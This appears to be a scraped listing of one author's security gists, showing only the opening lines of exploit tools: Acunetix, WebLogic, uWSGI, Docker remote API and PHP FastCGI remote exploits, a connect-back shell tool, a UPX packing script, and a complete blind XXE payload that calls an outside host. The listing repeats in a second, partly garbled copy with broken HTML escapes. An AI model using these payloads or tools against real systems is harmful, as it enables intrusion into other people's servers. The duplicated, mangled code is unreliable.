GaRY wofeiwo

## build.sh
#! /bin/sh

GOOS=linux go build -o $2 "$1"
GOOS=linux go build -ldflags="-s -w" -o $2.-sw "$1"
upx -f --brute -o $2.upx $2
upx -f --brute -o $2.-sw.upx $2.-sw

GOOS=linux gotip build -o $2.tip "$1"
GOOS=linux gotip build -ldflags="-s -w" -o $2.tip.-sw "$1"
upx -f --brute -o $2.tip.upx $2.tip

## acu0day.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Acunetix  0day SYSTEM Remote Command Execution by Daniele Linguaglossa

This PoC exploit 2 vulnerability in Acunetix core , the first one is a RCE (Remote Command  Exec) and the second one is
a LPE (Local Privilege Escalation).

All credits for this exploit goes to Daniele Linguaglossa
"""

## Weblogic_WLS_exp.py
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def payload_command (command_in):
    html_escape_table = {
        "&": "&amp;",
        '"': "&quot;",

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## uwsgi_exp.py
#!/usr/bin/python
# coding: utf-8
# Author: wofeiwo@80sec.com
# Last modified: 2017-7-18
# Note: Just for research purpose

import sys
import socket
import argparse
import requests

## docker-remote-api-exp.go
package main

import (
	"flag"
	"fmt"
	"io"
	"io/ioutil"
	"os"
	"path/filepath"
	"strconv"

## py-wget.py
#!/usr/bin/python
# encoding=utf-8
import requests, sys, os, re, time
from optparse import OptionParser

class wget:
	def __init__(self, config = {}):
		self.config = {
			'block': int(config['block'] if config.has_key('block') else 1024),
		}

## fcgi_exp.go
// PHP FactCGI remote exploit
// Date: 2012-09-15
// Author: wofeiwo@80sec.com
// Note: Just for research purpose

package main

import (
	"./fcgiclient"
	"fmt"

## bk.c
/*
Connect back tools
compile under linux
2003-07-11 now support FreeBSD ..
now support user define echo value
[bkbll@mobile bkbll]$ uname -a
Linux mobile 2.4.18-3custom #1 Èý 11ÔÂ 20 19:46:20 CST 2002 i686 unknown
%uname -a
FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386
[bkbll@mobile ownprog]$ ./cntoltty 192.168.8.110 5555

## fcgi_jailbreak.php
<?php
/**
 * PHP 5.3.3+ FASTCGI jailbreak
 *
 * @author      wofeiwo <wofeiwo#80sec.com>
 * @date        2013-01-23
 * @version     1.0
 * @reference   https://bugs.php.net/bug.php?id=64103
 * @reference   http://www.wooyun.org/bugs/wooyun-2013-018116 (Chinese)
 * @note        disable php security settings, but can't overwrite disable_function/disable_classes.
	#! /bin/sh

	GOOS=linux go build -o $2 "$1"
	GOOS=linux go build -ldflags="-s -w" -o $2.-sw "$1"
	upx -f --brute -o $2.upx $2
	upx -f --brute -o $2.-sw.upx $2.-sw

	GOOS=linux gotip build -o $2.tip "$1"
	GOOS=linux gotip build -ldflags="-s -w" -o $2.tip.-sw "$1"
	upx -f --brute -o $2.tip.upx $2.tip
	#!/usr/bin/env python
	# -- coding: utf-8 --
	"""
	Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa

	This PoC exploit 2 vulnerability in Acunetix core , the first one is a RCE (Remote Command Exec) and the second one is
	a LPE (Local Privilege Escalation).

	All credits for this exploit goes to Daniele Linguaglossa
	"""
	import requests
	import sys
	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


	def payload_command (command_in):
	html_escape_table = {
	"&": "&",
	'"': """,
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	#!/usr/bin/python
	# coding: utf-8
	# Author: wofeiwo@80sec.com
	# Last modified: 2017-7-18
	# Note: Just for research purpose

	import sys
	import socket
	import argparse
	import requests
	package main

	import (
	"flag"
	"fmt"
	"io"
	"io/ioutil"
	"os"
	"path/filepath"
	"strconv"
	#!/usr/bin/python
	# encoding=utf-8
	import requests, sys, os, re, time
	from optparse import OptionParser

	class wget:
	def __init__(self, config = {}):
	self.config = {
	'block': int(config['block'] if config.has_key('block') else 1024),
	}
	// PHP FactCGI remote exploit
	// Date: 2012-09-15
	// Author: wofeiwo@80sec.com
	// Note: Just for research purpose

	package main

	import (
	"./fcgiclient"
	"fmt"
	/*
	Connect back tools
	compile under linux
	2003-07-11 now support FreeBSD ..
	now support user define echo value
	[bkbll@mobile bkbll]$ uname -a
	Linux mobile 2.4.18-3custom #1 Èý 11ÔÂ 20 19:46:20 CST 2002 i686 unknown
	%uname -a
	FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386
	[bkbll@mobile ownprog]$ ./cntoltty 192.168.8.110 5555
	<?php
	/**
	* PHP 5.3.3+ FASTCGI jailbreak
	*
	* @author wofeiwo <wofeiwo#80sec.com>
	* @date 2013-01-23
	* @version 1.0
	* @reference https://bugs.php.net/bug.php?id=64103
	* @reference http://www.wooyun.org/bugs/wooyun-2013-018116 (Chinese)
	* @note disable php security settings, but can't overwrite disable_function/disable_classes.